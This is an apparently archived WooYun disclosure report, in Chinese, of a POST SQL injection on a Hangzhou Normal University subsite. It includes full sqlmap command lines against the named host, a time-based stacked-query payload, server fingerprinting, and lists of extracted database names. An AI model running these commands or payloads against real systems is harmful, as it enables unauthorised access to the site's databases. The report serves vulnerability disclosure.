当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0174691

漏洞标题:杭州师范大学某站注入(用了waf也不要自信)

相关厂商:杭州师范大学

漏洞作者: xq17

提交时间:2016-02-04 09:49

修复时间:2016-02-22 09:00

公开时间:2016-02-22 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-02-04: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

23333--审核求过

详细说明:

自己写的小杀器毕竟不够屌--虽然爆了很多get可是不出数据有waf好像把
http://yyxy.hznu.edu.cn/news.asp title_Search=88952634
报告主人该处存在POST sql注入漏洞--post去忽略了啊
既然这样直接开sqlmap罗盲住。--可以出数据
跑到卡机了就不跑了有表

漏洞证明:

E:\PHPnow-1.5.6.4237493736\htdocs\proxy\sqlmapproject-sqlmap-0.9-4439-gaee47d3\
qlmapproject-sqlmap-aee47d3>sqlmap.py -u "http://yyxy.hznu.edu.cn/news.asp" --d
ta "title_Search=123"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201512180a8c}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program
[*] starting at 22:52:19
[22:52:20] [INFO] testing connection to the target URL
[22:52:20] [INFO] checking if the target is protected by some kind of WAF/IPS/I
S
[22:52:20] [INFO] testing if the target URL is stable
[22:52:21] [INFO] target URL is stable
[22:52:21] [INFO] testing if POST parameter 'title_Search' is dynamic
[22:52:21] [WARNING] POST parameter 'title_Search' does not appear dynamic
[22:52:21] [WARNING] heuristic (basic) test shows that POST parameter 'title_Se
rch' might not be injectable
[22:52:21] [INFO] testing for SQL injection on POST parameter 'title_Search'
[22:52:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:52:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
[22:52:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER
Y or GROUP BY clause'
[22:52:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:52:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE
r HAVING clause'
[22:52:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XML
ype)'
[22:52:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[22:52:33] [INFO] testing 'MySQL inline queries'
[22:52:33] [INFO] testing 'PostgreSQL inline queries'
[22:52:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:52:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:52:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[22:52:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment
'
[22:52:47] [INFO] POST parameter 'title_Search' seems to be 'Microsoft SQL Serv
r/Sybase stacked queries (comment)' injectable
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for '['Microsoft SQL
erver', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n]
[22:52:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:52:50] [INFO] automatically extending ranges for UNION query injection tech
ique tests as there is at least one other (potential) technique found
[22:52:51] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending
he range for current UNION query injection technique test
[22:52:52] [INFO] target URL appears to have 9 columns in query
injection not exploitable with NULL values. Do you want to try with a random in
eger value for option '--union-char'? [Y/n]
[22:53:22] [WARNING] if UNION based SQL injection is not detected, please consi
er forcing the back-end DBMS (e.g. '--dbms=mysql')
[22:53:22] [INFO] checking if the injection point on POST parameter 'title_Sear
h' is a false positive
POST parameter 'title_Search' is vulnerable. Do you want to keep testing the ot
ers (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 141 HTTP(s)
equests:
---
Parameter: title_Search (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: title_Search=123';WAITFOR DELAY '0:0:5'--
---
[22:53:41] [INFO] testing Microsoft SQL Server
[22:53:41] [WARNING] it is very important not to stress the network adapter dur
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[22:53:54] [INFO] confirming Microsoft SQL Server
[22:54:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[22:54:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 12 times
[22:54:00] [INFO] fetched data logged to text files under 'C:\Documents and Set
ings\Administrator\.sqlmap\output\yyxy.hznu.edu.cn'
[*] shutting down at 22:54:00
E:\PHPnow-1.5.6.4237493736\htdocs\proxy\sqlmapproject-sqlmap-0.9-4439-gaee47d3\
qlmapproject-sqlmap-aee47d3>sqlmap.py -u "http://yyxy.hznu.edu.cn/news.asp" --d
ta "title_Search=123" --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201512180a8c}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program
[*] starting at 22:54:24
[22:54:25] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:54:25] [INFO] testing connection to the target URL
[22:54:25] [INFO] checking if the target is protected by some kind of WAF/IPS/I
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title_Search (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: title_Search=123';WAITFOR DELAY '0:0:5'--
---
[22:54:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[22:54:25] [INFO] fetching database names
[22:54:25] [INFO] fetching number of databases
[22:54:25] [WARNING] time-based comparison requires larger statistical model, p
ease wait..............................
[22:54:32] [WARNING] it is very important not to stress the network adapter dur
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
1
[22:54:51] [INFO] adjusting time delay to 1 second due to good response times
6
[22:54:53] [INFO] retrieved: Artsexam
[22:55:45] [INFO] retrieved: hzmusic
[22:56:29] [INFO] retrieved: master
[22:57:08] [INFO] retrieved: model
[22:57:41] [INFO] retrieved: msdb
[22:58:06] [INFO] retrieved: museum
[22:58:43] [INFO] retrieved: Northwind
[22:59:44] [INFO] retrieved: p
[23:00:01] [ERROR] invalid character detected. retrying..
[23:00:01] [WARNING] increasing time delay to 2 seconds
ubs
[23:00:31] [INFO] retrieved: sw

修复方案:

过滤吧--认真给分吧---你们安全做的不错又是350又是d盾的吓死宝宝了

版权声明:转载请注明来源 xq17@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-22 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无